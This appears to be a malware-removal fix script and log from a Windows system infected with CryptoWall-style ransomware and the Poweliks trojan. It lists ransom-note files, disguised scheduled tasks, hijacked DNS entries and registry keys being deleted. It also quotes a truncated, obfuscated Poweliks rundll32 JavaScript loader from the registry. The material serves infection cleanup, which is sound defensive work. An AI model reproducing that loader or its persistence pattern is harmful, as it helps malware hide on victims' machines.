Tcpip\..\Interfaces\{9B004C7D-7A34-4A9C-BEDB-5212A582FAB1}: [NameServer] 8.8.8.8,8.8.8.8,8.8.8.8,8.8.8.8,8.8.8.8,8.8.8.8,8.8.8.8,8.8.8.8,8.8.8.8,8.8.8.8,8.8.8.8,8.8.8.8
Tcpip\..\Interfaces\{D24FA36B-6CD5-4603-8F72-73AC28D99F5B}: [NameServer] 8.8.8.8,8.8.8.8,8.8.8.8,8.8.8.8,8.8.8.8,8.8.8.8
2015-02-21 22:24 - 2015-02-21 22:24 - 00008630 _____ () C:\Users\Dorothy01\HELP_DECRYPT.HTML
2015-02-21 22:24 - 2015-02-21 22:24 - 00008630 _____ () C:\Users\Dorothy01\Downloads\HELP_DECRYPT.HTML
2015-02-21 22:24 - 2015-02-21 22:24 - 00008630 _____ () C:\Users\Dorothy01\Desktop\HELP_DECRYPT.HTML
2015-02-21 22:24 - 2015-02-21 22:24 - 00004258 _____ () C:\Users\Dorothy01\HELP_DECRYPT.TXT
2015-02-21 22:24 - 2015-02-21 22:24 - 00004258 _____ () C:\Users\Dorothy01\Downloads\HELP_DECRYPT.TXT
2015-02-21 22:24 - 2015-02-21 22:24 - 00004258 _____ () C:\Users\Dorothy01\Desktop\HELP_DECRYPT.TXT
2015-02-21 22:24 - 2015-02-21 22:24 - 00000292 _____ () C:\Users\Dorothy01\HELP_DECRYPT.URL
2015-02-21 22:24 - 2015-02-21 22:24 - 00000292 _____ () C:\Users\Dorothy01\Downloads\HELP_DECRYPT.URL
2015-02-21 22:24 - 2015-02-21 22:24 - 00000292 _____ () C:\Users\Dorothy01\Desktop\HELP_DECRYPT.URL
2015-02-19 21:10 - 2015-02-21 03:14 - 00000292 _____ () C:\HELP_DECRYPT.URL
2015-02-19 21:07 - 2015-02-19 21:07 - 00023552 _____ () C:\Users\Dorothy01\AppData\Local\pckunie.dll
2015-02-19 23:28 - 2014-11-14 15:44 - 00000000 ____D () C:\Users\Dorothy01\AppData\Roaming\Adhoxi
2015-02-19 23:28 - 2014-07-23 15:49 - 00000000 ____D () C:\Users\Dorothy01\AppData\Roaming\unpacked23206
2015-02-19 22:45 - 2014-11-26 18:24 - 00000000 ____D () C:\ProgramData\bamgaq
2015-02-19 22:11 - 2014-11-07 11:27 - 00000000 ____D () C:\Users\Dorothy01\AppData\Local\{30112b75-e574-a6db-560c-8103291a0838}
2015-02-19 21:07 - 2014-12-03 17:38 - 00000000 ____D () C:\ProgramData\PenulErhig
2015-02-19 07:40 - 2015-01-13 16:26 - 00000000 ____D () C:\Users\Dorothy01\AppData\Roaming\Kuseyd
2015-02-19 07:40 - 2015-01-13 16:26 - 00000000 ____D () C:\Users\Dorothy01\AppData\Roaming\Guhyanmo
2015-02-19 07:40 - 2015-01-06 13:58 - 00000000 ____D () C:\Users\Dorothy01\AppData\Roaming\Veepme
2015-02-19 07:40 - 2015-01-05 20:36 - 00000000 ____D () C:\Users\Dorothy01\AppData\Roaming\Kybeuv
2015-02-19 07:40 - 2015-01-05 15:02 - 00000000 ____D () C:\Users\Dorothy01\AppData\Roaming\Wiudiz
2015-02-19 07:40 - 2015-01-02 12:19 - 00000000 ____D () C:\Users\Dorothy01\AppData\Roaming\Tapyara
2015-02-19 07:40 - 2014-12-26 17:52 - 00000000 ____D () C:\Users\Dorothy01\AppData\Roaming\Rifiewyn
2015-02-19 07:40 - 2014-12-25 17:44 - 00000000 ____D () C:\Users\Dorothy01\AppData\Roaming\Ynopqual
2015-02-19 07:40 - 2014-12-25 15:54 - 00000000 ____D () C:\Users\Dorothy01\AppData\Roaming\Ihywkead
2015-02-19 07:40 - 2014-12-25 15:43 - 00000000 ____D () C:\Users\Dorothy01\AppData\Roaming\Ekmiys
2015-02-19 07:40 - 2014-12-23 15:28 - 00000000 ____D () C:\Users\Dorothy01\AppData\Roaming\Maypyz
2015-02-19 07:40 - 2014-12-22 15:27 - 00000000 ____D () C:\Users\Dorothy01\AppData\Roaming\Fuwutee
2015-02-19 07:40 - 2014-12-22 14:56 - 00000000 ____D () C:\Users\Dorothy01\AppData\Roaming\Fyarxy
2015-02-19 07:40 - 2014-12-21 15:20 - 00000000 ____D () C:\Users\Dorothy01\AppData\Roaming\Zekubuab
2015-02-19 07:40 - 2014-12-15 16:15 - 00000000 ____D () C:\Users\Dorothy01\AppData\Roaming\Wuwuec
2015-02-19 07:40 - 2014-12-14 15:11 - 00000000 ____D () C:\Users\Dorothy01\AppData\Roaming\Byloaq
2015-02-19 07:40 - 2014-12-12 15:35 - 00000000 ____D () C:\Users\Dorothy01\AppData\Roaming\Yhohybe
2015-02-19 07:40 - 2014-12-11 21:23 - 00000000 ____D () C:\Users\Dorothy01\AppData\Roaming\Hovoote
2015-02-19 07:40 - 2014-12-11 16:09 - 00000000 ____D () C:\Users\Dorothy01\AppData\Roaming\Amcyocut
2015-02-19 07:40 - 2014-12-11 09:47 - 00000000 ____D () C:\Users\Dorothy01\AppData\Roaming\Itsefo
2015-02-19 07:40 - 2014-12-08 17:45 - 00000000 ____D () C:\Users\Dorothy01\AppData\Roaming\Tumiexcu
2015-02-19 07:40 - 2014-12-08 16:37 - 00000000 ____D () C:\Users\Dorothy01\AppData\Roaming\Ziqeexew
2015-02-19 07:40 - 2014-12-04 15:16 - 00000000 ____D () C:\Users\Dorothy01\AppData\Roaming\Mawywopo
2015-02-19 07:40 - 2014-12-03 17:42 - 00000000 ____D () C:\Users\Dorothy01\AppData\Roaming\Icxeewhu
2015-02-19 07:40 - 2014-12-03 13:46 - 00000000 ____D () C:\Users\Dorothy01\AppData\Roaming\Ucucni
2015-02-19 07:40 - 2014-12-02 18:10 - 00000000 ____D () C:\Users\Dorothy01\AppData\Roaming\Edutsoix
2015-02-19 07:40 - 2014-12-01 10:45 - 00000000 ____D () C:\Users\Dorothy01\AppData\Roaming\Ruyxku
2015-02-19 07:40 - 2014-12-01 10:45 - 00000000 ____D () C:\Users\Dorothy01\AppData\Roaming\Huqokayx
2015-02-19 07:40 - 2014-12-01 10:42 - 00000000 ____D () C:\ProgramData\TifwIdyo
2015-02-19 07:40 - 2014-12-01 10:42 - 00000000 ____D () C:\ProgramData\BolsiWelug
2015-02-19 07:40 - 2014-11-28 08:56 - 00000000 ____D () C:\ProgramData\PeboZnoli
2015-02-19 07:40 - 2014-11-28 08:56 - 00000000 ____D () C:\ProgramData\CecuSefki
2015-02-19 07:40 - 2014-11-24 20:33 - 00000000 ____D () C:\Users\Dorothy01\AppData\Roaming\Itufefv
2015-02-19 07:40 - 2014-11-24 20:28 - 00000000 ____D () C:\ProgramData\FapziGguzq
2015-02-19 07:40 - 2014-11-23 15:14 - 00000000 ____D () C:\Users\Dorothy01\AppData\Roaming\Senyzayr
2015-02-19 07:40 - 2014-11-23 15:09 - 00000000 ____D () C:\ProgramData\QiktiWuffu
2015-02-19 07:40 - 2014-11-23 15:09 - 00000000 ____D () C:\ProgramData\FadyOdyu
2015-02-19 07:40 - 2014-11-23 08:58 - 00000000 ____D () C:\Users\Dorothy01\AppData\Roaming\Zacosia
2015-02-19 07:40 - 2014-11-23 08:53 - 00000000 ____D () C:\Users\Dorothy01\AppData\Roaming\Ecqootfi
2015-02-19 07:40 - 2014-11-23 08:43 - 00000000 ____D () C:\ProgramData\TixoZuwu
2015-02-19 07:40 - 2014-11-20 15:57 - 00000000 ____D () C:\Users\Dorothy01\AppData\Roaming\Ymqiuky
2015-02-19 07:40 - 2014-11-20 15:57 - 00000000 ____D () C:\Users\Dorothy01\AppData\Roaming\Qaedxa
2015-02-19 07:40 - 2014-11-20 15:54 - 00000000 ____D () C:\Users\Dorothy01\AppData\Roaming\Hyipfy
2015-02-19 07:40 - 2014-11-20 15:49 - 00000000 ____D () C:\ProgramData\EiniHubex
2015-02-19 07:40 - 2014-11-19 16:07 - 00000000 ____D () C:\Users\Dorothy01\AppData\Roaming\Woakduwa
2015-02-19 07:40 - 2014-11-19 16:07 - 00000000 ____D () C:\Users\Dorothy01\AppData\Roaming\Obmukany
2015-02-19 07:40 - 2014-11-19 16:03 - 00000000 ____D () C:\ProgramData\GuxeXowi
2015-02-19 07:40 - 2014-11-18 15:30 - 00000000 ____D () C:\Users\Dorothy01\AppData\Roaming\Gynika
2015-02-19 07:40 - 2014-11-18 15:30 - 00000000 ____D () C:\Users\Dorothy01\AppData\Roaming\Egewtoi
2015-02-19 07:40 - 2014-11-18 15:26 - 00000000 ____D () C:\ProgramData\MokeVike
2015-02-19 07:40 - 2014-11-17 19:11 - 00000000 ____D () C:\Users\Dorothy01\AppData\Roaming\Pevyliu
2015-02-19 07:40 - 2014-11-17 19:11 - 00000000 ____D () C:\Users\Dorothy01\AppData\Roaming\Ciokov
2015-02-19 07:40 - 2014-11-17 19:07 - 00000000 ____D () C:\ProgramData\MesmAyof
2015-02-19 07:40 - 2014-11-17 10:10 - 00000000 ____D () C:\Users\Dorothy01\AppData\Roaming\Ohvyev
2015-02-19 07:40 - 2014-11-17 10:10 - 00000000 ____D () C:\Users\Dorothy01\AppData\Roaming\Esisgyl
2015-02-19 07:40 - 2014-11-17 10:05 - 00000000 ____D () C:\ProgramData\LuqePana
2015-02-19 07:40 - 2014-11-16 11:38 - 00000000 ____D () C:\ProgramData\YuctAren
2015-02-19 07:40 - 2014-11-16 11:38 - 00000000 ____D () C:\ProgramData\GiqyoCxuko
2015-02-19 07:40 - 2014-11-16 11:02 - 00000000 ____D () C:\ProgramData\JoheMsum
2015-02-19 07:40 - 2014-11-16 11:02 - 00000000 ____D () C:\ProgramData\JahebSuhvo
2015-02-19 07:40 - 2014-11-15 11:27 - 00000000 ____D () C:\ProgramData\HozbEzpud
2015-02-19 07:40 - 2014-11-15 11:27 - 00000000 ____D () C:\ProgramData\FasuTuhu
2015-02-19 07:40 - 2014-11-14 15:44 - 00000000 ____D () C:\Users\Dorothy01\AppData\Roaming\Ytbynede
2015-02-19 07:40 - 2014-11-14 15:40 - 00000000 ____D () C:\ProgramData\NeheQiri
2015-02-19 07:40 - 2014-11-14 15:40 - 00000000 ____D () C:\ProgramData\KaseJolmi
2015-02-19 07:40 - 2014-11-13 18:25 - 00000000 ____D () C:\Users\Dorothy01\AppData\Roaming\Ezrydu
2015-02-19 07:40 - 2014-11-13 18:21 - 00000000 ____D () C:\ProgramData\UardiNdeca
2015-02-19 07:40 - 2014-11-13 10:22 - 00000000 ____D () C:\Users\Dorothy01\AppData\Roaming\Sequefb
2015-02-19 07:40 - 2014-11-13 10:22 - 00000000 ____D () C:\Users\Dorothy01\AppData\Roaming\Onpyym
2015-02-19 07:40 - 2014-11-13 10:17 - 00000000 ____D () C:\ProgramData\UopiJowv
2015-02-19 07:40 - 2014-11-13 10:17 - 00000000 ____D () C:\ProgramData\DervUvon
2015-02-19 07:40 - 2014-11-12 17:45 - 00000000 ____D () C:\Users\Dorothy01\AppData\Roaming\Ezupuhaf
2015-02-19 07:40 - 2014-11-12 17:40 - 00000000 ____D () C:\ProgramData\PokuGehos
2015-02-19 07:40 - 2014-11-12 17:40 - 00000000 ____D () C:\ProgramData\NerxElyo
2015-02-19 07:40 - 2014-11-11 20:48 - 00000000 ____D () C:\Users\Dorothy01\AppData\Roaming\Upvukyy
2015-02-19 07:40 - 2014-11-11 20:47 - 00000000 ____D () C:\Users\Dorothy01\AppData\Roaming\Olaqduqo
2015-02-19 07:40 - 2014-11-11 20:42 - 00000000 ____D () C:\ProgramData\PapoSutul
2015-02-19 07:40 - 2014-11-11 20:42 - 00000000 ____D () C:\ProgramData\MoruYemq
2015-02-19 07:40 - 2014-11-11 18:14 - 00000000 ____D () C:\ProgramData\JufhEnusi
2015-02-19 07:40 - 2014-11-10 16:29 - 00000000 ____D () C:\ProgramData\YansAjfir
2015-02-19 07:40 - 2014-11-10 16:29 - 00000000 ____D () C:\ProgramData\KitpUxijo
2015-02-19 07:40 - 2014-11-07 17:00 - 00000000 ____D () C:\Users\Dorothy01\AppData\Local\Ugmedia
2015-02-19 07:40 - 2014-11-07 16:59 - 00000000 ____D () C:\ProgramData\XiceNnar
2015-02-19 07:40 - 2014-11-07 16:59 - 00000000 ____D () C:\ProgramData\TobaFisa
2015-02-19 07:40 - 2014-10-02 15:49 - 00000000 ____D () C:\Users\Dorothy01\AppData\Local\tmp1461
2015-02-01 20:32 - 2014-11-10 16:30 - 00000648 _____ () C:\ProgramData\@system.temp
2015-02-01 20:32 - 2014-11-10 16:30 - 00000384 ____H () C:\ProgramData\@system3.att
2014-11-13 18:51 - 2015-01-07 09:58 - 0000288 _____ () C:\Users\Dorothy01\AppData\Roaming\1B477081.reg
2014-11-21 18:59 - 2014-11-21 18:59 - 0022327 _____ () C:\Users\Dorothy01\AppData\Roaming\893686b8
2014-11-12 18:01 - 2014-11-12 18:01 - 0008542 _____ () C:\Users\Dorothy01\AppData\Roaming\DECRYPT_INSTRUCTION.HTML
2014-11-12 18:01 - 2014-11-12 18:01 - 0004214 _____ () C:\Users\Dorothy01\AppData\Roaming\DECRYPT_INSTRUCTION.TXT
2015-01-12 15:11 - 2015-01-12 15:11 - 0008562 _____ () C:\Users\Dorothy01\AppData\Roaming\HELP_DECRYPT.HTML
2015-01-12 15:11 - 2015-01-12 15:11 - 0001270 _____ () C:\Users\Dorothy01\AppData\Roaming\HELP_DECRYPT.PNG
2015-01-12 15:11 - 2015-01-12 15:11 - 0004224 _____ () C:\Users\Dorothy01\AppData\Roaming\HELP_DECRYPT.TXT
2014-11-10 16:30 - 2014-11-10 16:30 - 0000448 ____H () C:\Users\Dorothy01\AppData\Roaming\????
2014-11-21 18:59 - 2014-11-21 18:59 - 0037439 _____ () C:\Users\Dorothy01\AppData\Local\893686b8
2014-11-12 18:01 - 2014-11-12 18:01 - 0008542 _____ () C:\Users\Dorothy01\AppData\Local\DECRYPT_INSTRUCTION.HTML
2014-11-12 18:01 - 2014-11-12 18:01 - 0004214 _____ () C:\Users\Dorothy01\AppData\Local\DECRYPT_INSTRUCTION.TXT
2014-12-11 09:44 - 2014-12-11 21:24 - 0929536 _____ () C:\Users\Dorothy01\AppData\Local\f5e83w4ef.dat
2015-01-12 15:10 - 2015-01-12 15:10 - 0008562 _____ () C:\Users\Dorothy01\AppData\Local\HELP_DECRYPT.HTML
2015-01-12 15:10 - 2015-01-12 15:10 - 0001270 _____ () C:\Users\Dorothy01\AppData\Local\HELP_DECRYPT.PNG
2015-01-12 15:10 - 2015-01-12 15:10 - 0004224 _____ () C:\Users\Dorothy01\AppData\Local\HELP_DECRYPT.TXT
2015-02-19 21:07 - 2015-02-19 21:07 - 0023552 _____ () C:\Users\Dorothy01\AppData\Local\pckunie.dll
2015-02-21 03:30 - 2015-02-21 03:30 - 0023552 _____ () C:\Users\Dorothy01\AppData\Local\pgkunge.dll
2014-11-21 18:59 - 2014-11-21 18:59 - 0026477 _____ () C:\ProgramData\893686b8
2014-11-10 16:30 - 2015-02-01 20:32 - 0000648 _____ () C:\ProgramData\@system.temp
2014-11-10 16:30 - 2015-02-01 20:32 - 0000384 ____H () C:\ProgramData\@system3.att
2015-01-12 15:09 - 2015-01-12 15:09 - 0008562 _____ () C:\ProgramData\HELP_DECRYPT.HTML
2015-01-12 15:09 - 2015-01-12 15:09 - 0001270 _____ () C:\ProgramData\HELP_DECRYPT.PNG
2015-01-12 15:09 - 2015-01-12 15:09 - 0004224 _____ () C:\ProgramData\HELP_DECRYPT.TXT
C:\Users\Dorothy01\AppData\Local\Temp\getmhost.exe
C:\Users\Dorothy01\AppData\Local\Temp\ARS.exe
C:\Users\Dorothy01\AppData\Local\Temp\dllnt_dump.dll
C:\Users\Dorothy01\AppData\Local\Temp\getmhost.exe
C:\Users\Dorothy01\AppData\Local\Temp\ivbhim.exe
C:\Users\Dorothy01\AppData\Local\Temp\jre-8u31-windows-au.exe
C:\Users\Dorothy01\AppData\Local\Temp\sqlite3.dll
C:\Users\Dorothy01\AppData\Local\Temp\tmp7A9C.tmp.exe
Task: {0AF68A16-8BB9-4884-9B4E-15D4F360BB7B} - System32\Tasks\Security Center Update - 2036164130 => C:\Users\Dorothy01\AppData\Roaming\Yhohybe\odhie.exe <==== ATTENTION
Task: {0C23B36F-F62C-434F-AA02-5ADBADF1858B} - System32\Tasks\Security Center Update - 2231539794 => C:\Users\Dorothy01\AppData\Roaming\Qaedxa\uwywweo.exe <==== ATTENTION
Task: {14653784-6568-4765-B81E-19CEB2C29EEF} - System32\Tasks\Security Center Update - 304447838 => C:\Users\Dorothy01\AppData\Roaming\Fyarxy\odrakal.exe <==== ATTENTION
Task: {1DE689D1-D5D6-4E99-9906-A33502FF48FF} - System32\Tasks\Security Center Update - 3156874879 => C:\Users\Dorothy01\AppData\Roaming\Ziqeexew\peisomr.exe <==== ATTENTION
Task: {29FD53A0-B0E0-4AC5-A535-A77BDBAB7300} - System32\Tasks\Security Center Update - 1511213846 => C:\Users\Dorothy01\AppData\Roaming\Ynopqual\epeht.exe <==== ATTENTION
Task: {34D40EAE-6659-4B8C-8F0E-5D9D8F76EE87} - System32\Tasks\Security Center Update - 3665910781 => C:\Users\Dorothy01\AppData\Roaming\Ekmiys\edanuzh.exe <==== ATTENTION
Task: {38AD3EE9-89B1-4FE8-BD3A-C268041E30AB} - System32\Tasks\Security Center Update - 3379427597 => C:\Users\Dorothy01\AppData\Roaming\Obmukany\otipky.exe <==== ATTENTION
Task: {46591690-E2C7-4AB5-90B8-0807BF83FA2E} - System32\Tasks\Security Center Update - 1219234967 => C:\Users\Dorothy01\AppData\Roaming\Hovoote\viywyke.exe <==== ATTENTION
Task: {4FE7F4B5-6216-4BF5-B69B-AE6DCAB85ACC} - System32\Tasks\Security Center Update - 951185298 => C:\Users\Dorothy01\AppData\Roaming\Tumiexcu\esinwii.exe <==== ATTENTION
Task: {506490F7-3376-4EFC-A901-586AA3303B44} - System32\Tasks\Security Center Update - 2325803103 => C:\Users\Dorothy01\AppData\Roaming\Adhoxi\vywipir.exe <==== ATTENTION
Task: {516E887F-D9AA-43E6-A51E-2905BC435DC3} - System32\Tasks\Security Center Update - 1528112639 => C:\Users\Dorothy01\AppData\Roaming\Kuseyd\ihnoxa.exe <==== ATTENTION
Task: {58DBAADD-4BFC-48F9-A19E-02A3DBE8DB7A} - System32\Tasks\Security Center Update - 2901739987 => C:\Users\Dorothy01\AppData\Roaming\Icxeewhu\avazx.exe <==== ATTENTION
Task: {62015E40-868F-450C-BB00-4F2987356F87} - System32\Tasks\Security Center Update - 3903236305 => C:\Users\Dorothy01\AppData\Roaming\Itufefv\qusieny.exe <==== ATTENTION
Task: {636CB7B6-8835-4A64-A923-ED55EB0D8640} - System32\Tasks\Security Center Update - 2512843633 => C:\Users\Dorothy01\AppData\Roaming\Ohvyev\yketpyu.exe <==== ATTENTION
Task: {6378A9C8-1406-4725-9242-44BFD048B5CE} - System32\Tasks\Security Center Update - 331106455 => C:\Users\Dorothy01\AppData\Roaming\Ymqiuky\mipiims.exe <==== ATTENTION
Task: {639A2A23-A522-40F7-AD5D-9F1245DF1A82} - System32\Tasks\Security Center Update - 2487970780 => C:\Users\Dorothy01\AppData\Roaming\Pevyliu\adelre.exe <==== ATTENTION
Task: {6BB0DD4F-FC46-49AF-B590-4F9F44C7E1A7} - System32\Tasks\rspahma => C:\Users\DOROTH~1\AppData\Local\Temp\utyczdi.exe <==== ATTENTION
Task: {70C6EC5A-CD9A-41DE-8073-EBF9E70D4E54} - System32\Tasks\Security Center Update - 3838766864 => C:\Users\Dorothy01\AppData\Roaming\Ezrydu\xyelefq.exe <==== ATTENTION
Task: {72165FBF-954D-4040-B5B5-BC5F9EED3A0E} - System32\Tasks\Security Center Update - 3216473386 => C:\Users\Dorothy01\AppData\Roaming\Zacosia\geulby.exe <==== ATTENTION
Task: {7430F638-B12A-445A-BBEF-5E8F514DF753} - System32\Tasks\Security Center Update - 699896687 => C:\Users\Dorothy01\AppData\Roaming\Itsefo\zyyzpii.exe <==== ATTENTION
Task: {7444E2A1-12CB-40A5-B56A-3E21543B4514} - System32\Tasks\Security Center Update - 3204526539 => C:\Users\Dorothy01\AppData\Roaming\Huqokayx\cazol.exe <==== ATTENTION
Task: {797B7B84-6E57-4129-A6A9-7A7099782A48} - System32\Tasks\Security Center Update - 242654636 => C:\Users\Dorothy01\AppData\Roaming\Maypyz\acoxv.exe <==== ATTENTION
Task: {7BB4C936-AFE9-405B-8288-876487348757} - System32\Tasks\Security Center Update - 116467704 => C:\Users\Dorothy01\AppData\Roaming\Zekubuab\usloe.exe <==== ATTENTION
Task: {7E32FCE3-C859-49A2-8E75-598B56230006} - System32\Tasks\Security Center Update - 4028262528 => C:\Users\Dorothy01\AppData\Roaming\Byloaq\uzodzay.exe <==== ATTENTION
Task: {833517E7-60C9-4EBA-B5E2-E1A24D86CE1A} - System32\Tasks\Security Center Update - 2519066445 => C:\Users\Dorothy01\AppData\Roaming\Ruyxku\vyfyr.exe <==== ATTENTION
Task: {86BAB3C1-BEB4-4F5B-9723-D319FC15EB44} - System32\Tasks\Security Center Update - 1810362612 => C:\Users\Dorothy01\AppData\Roaming\Senyzayr\ynval.exe <==== ATTENTION
Task: {8A4EFB2F-EFF1-4B4C-A1E0-641064B8C832} - System32\Tasks\Security Center Update - 3747167081 => C:\Users\Dorothy01\AppData\Roaming\Kybeuv\zywefu.exe <==== ATTENTION
Task: {91474FF9-C8FF-4F7E-B671-C5BAA856571C} - System32\Tasks\Security Center Update - 513270047 => C:\Users\Dorothy01\AppData\Roaming\Veepme\mearabi.exe <==== ATTENTION
Task: {9A50C6A9-6D3C-4A7F-B237-D2E34D535BAF} - System32\Tasks\Security Center Update - 4149247359 => C:\Users\Dorothy01\AppData\Roaming\Tapyara\ehubzy.exe <==== ATTENTION
Task: {9BD8C08F-7F0B-430E-AD7D-12988F4D4D76} - System32\Tasks\Security Center Update - 1179286971 => C:\Users\Dorothy01\AppData\Roaming\Ciokov\ekypu.exe <==== ATTENTION
Task: {9CD254AC-60CC-41FE-B8C7-884BAC0FA4A3} - System32\Tasks\Security Center Update - 1285267939 => C:\Users\Dorothy01\AppData\Roaming\Ytbynede\ebusfe.exe <==== ATTENTION
Task: {9DB27102-BD01-4DBA-AA72-192BAC09BFE7} - System32\Tasks\Security Center Update - 3201999599 => C:\Users\Dorothy01\AppData\Roaming\Ihywkead\olypozo.exe <==== ATTENTION
Task: {A24B621A-54AB-4FAF-9C35-FB0D87321DD4} - System32\Tasks\Security Center Update - 1259602875 => C:\Users\Dorothy01\AppData\Roaming\Egewtoi\kumysio.exe <==== ATTENTION
Task: {A31D10D4-B4CF-4475-B02B-0A9BEB4E6617} - System32\Tasks\Security Center Update - 2329648882 => C:\Users\Dorothy01\AppData\Roaming\Ecqootfi\inecimy.exe <==== ATTENTION
Task: {A3FB09EC-C469-45ED-8A04-7E9497A4358B} - System32\Tasks\Security Center Update - 532629427 => C:\Users\Dorothy01\AppData\Roaming\Mawywopo\yhrog.exe <==== ATTENTION
Task: {ACE571AA-4750-4BA4-9AB7-285B651F13E4} - System32\Tasks\Security Center Update - 578871115 => C:\Users\Dorothy01\AppData\Roaming\Wiudiz\areta.exe <==== ATTENTION
Task: {B1AE1850-9814-4733-A837-1BCFDCA93C2F} - System32\Tasks\Security Center Update - 1433702555 => C:\Users\Dorothy01\AppData\Roaming\Olaqduqo\oxico.exe <==== ATTENTION
Task: {B2111A5C-17C6-42AC-8232-C4BFBD5CEAE2} - System32\Tasks\Security Center Update - 2786531556 => C:\Users\Dorothy01\AppData\Roaming\Guhyanmo\usukrau.exe <==== ATTENTION
Task: {B31AB263-6E64-4AE6-9131-F03F3EB11C96} - System32\Tasks\Security Center Update - 2649167008 => C:\Users\Dorothy01\AppData\Roaming\Amcyocut\seovado.exe <==== ATTENTION
Task: {B69D26CC-F736-43EF-8678-4047B1182B5E} - System32\Tasks\Security Center Update - 4109173847 => C:\Users\Dorothy01\AppData\Roaming\Ezupuhaf\ziexepo.exe <==== ATTENTION
Task: {BA2069FF-78E4-45BC-B55E-CD0ACD43F066} - System32\Tasks\Security Center Update - 2002689914 => C:\Users\Dorothy01\AppData\Roaming\Hyipfy\eheqqu.exe <==== ATTENTION
Task: {BB68D13D-D1D6-492F-8D8C-218D8F32F366} - System32\Tasks\Security Center Update - 3566967998 => C:\Users\Dorothy01\AppData\Roaming\Sequefb\apxuyb.exe <==== ATTENTION
Task: {C0214B00-381D-48C6-8657-2096534B77ED} - System32\Tasks\Security Center Update - 2047020247 => C:\Users\Dorothy01\AppData\Roaming\Woakduwa\vyvefiy.exe <==== ATTENTION
Task: {C8F0BD03-484C-4EA4-B730-E73FCF57C579} - System32\Tasks\Security Center Update - 1058146964 => C:\Users\Dorothy01\AppData\Roaming\Esisgyl\hupoto.exe <==== ATTENTION
Task: {CCE07978-A743-41CE-84CE-1E73B09468DB} - System32\Tasks\Security Center Update - 4056442320 => C:\Users\Dorothy01\AppData\Roaming\Ucucni\qyhyg.exe <==== ATTENTION
Task: {D272D6E1-FF48-4D29-8FED-3859A8299DC8} - System32\Tasks\Security Center Update - 446489216 => C:\Users\Dorothy01\AppData\Roaming\Gynika\daboop.exe <==== ATTENTION
Task: {DAF472B5-87C9-4EB7-BD1F-23897D28E7CF} - System32\Tasks\Security Center Update - 4131681425 => C:\Users\Dorothy01\AppData\Roaming\Upvukyy\qikoiqp.exe <==== ATTENTION
Task: {DD416C59-DA11-4673-95DF-6CCB71853F43} - System32\Tasks\Security Center Update - 2300971329 => C:\Users\Dorothy01\AppData\Roaming\Fuwutee\kikiap.exe <==== ATTENTION
Task: {F0BDD635-04A8-43FD-B541-D9182F90415D} - System32\Tasks\Security Center Update - 4105554909 => C:\Users\Dorothy01\AppData\Roaming\Wuwuec\xeabac.exe <==== ATTENTION
Task: {F9426B1C-C5B8-43C1-9B81-F5F6932587E9} - System32\Tasks\Security Center Update - 700698430 => C:\Users\Dorothy01\AppData\Roaming\Edutsoix\idyzsya.exe <==== ATTENTION
Task: {FA7D302B-25B4-4938-976B-AFD59ED105BC} - System32\Tasks\Security Center Update - 3992158093 => C:\Users\Dorothy01\AppData\Roaming\Onpyym\puzyril.exe <==== ATTENTION
Task: {FDF8C72F-4705-4C83-B0F3-47690D02FCBE} - System32\Tasks\Security Center Update - 4183678770 => C:\Users\Dorothy01\AppData\Roaming\Rifiewyn\puyrdo.exe <==== ATTENTION
HKU\S-1-5-21-1427692388-1042374531-2795145444-1001\...A8F59079A8D5}\localserver32: rundll32.exe javascript:"\..\mshtml.dll,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf> (the data entry has 243 more characters). <==== Poweliks!
CustomCLSID: HKU\S-1-5-21-1427692388-1042374531-2795145444-1001_Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\localserver32 -> rundll32.exe javascript:"\..\mshtml.dll,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf> (the data entry has 251 more characters). <==== Poweliks?
Reboot:
end
*****************
 
Error: Restore point can only be created in normal mode.
Processes closed successfully.
HKLM\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\\CrashReportSaver => value deleted successfully.
"HKLM\Software\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\pckunie" => Key deleted successfully.
"HKLM\Software\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\pgkunge" => Key deleted successfully.
HKU\S-1-5-21-1427692388-1042374531-2795145444-1001\Software\Microsoft\Windows\CurrentVersion\Run\\acikmao => value deleted successfully.
HKU\S-1-5-21-1427692388-1042374531-2795145444-1001\Software\Microsoft\Windows\CurrentVersion\Run\\dccwmote => value deleted successfully.
"C:\Users\Dorothy01\AppData\Local\acikmao.dll" => File/Directory not found.
C:\Users\Dorothy01\AppData\Local\Temp\getmhost.exe => Moved successfully.
"HKU\S-1-5-21-1427692388-1042374531-2795145444-1001\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{5042c0a6-b247-11e4-bed4-089e013a632b}" => Key deleted successfully.
HKCR\CLSID\{5042c0a6-b247-11e4-bed4-089e013a632b} => Key not found. 
C:\Users\Dorothy01\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HELP_DECRYPT.HTML => Moved successfully.
C:\Users\Dorothy01\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HELP_DECRYPT.PNG => Moved successfully.
C:\Users\Dorothy01\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HELP_DECRYPT.TXT => Moved successfully.
C:\Users\Dorothy01\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HELP_DECRYPT.URL => Moved successfully.
"HKLM\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\SearchScopes\{D944BB61-2E34-4DBF-A683-47E505C587DC}" => Key deleted successfully.
HKCR\Wow6432Node\CLSID\{D944BB61-2E34-4DBF-A683-47E505C587DC} => Key not found. 
HKU\.DEFAULT\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\\DefaultScope => value deleted successfully.
HKU\S-1-5-19\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\\DefaultScope => value deleted successfully.
HKU\S-1-5-20\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\\DefaultScope => value deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{7F96F190-09C4-4BEC-B7FB-A9E26151EAB0}}" => Key deleted successfully.
HKCR\CLSID\{7F96F190-09C4-4BEC-B7FB-A9E26151EAB0}} => Key not found. 
"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{AA58ED58-01DD-4d91-8333-CF10577473F7}" => Key deleted successfully.
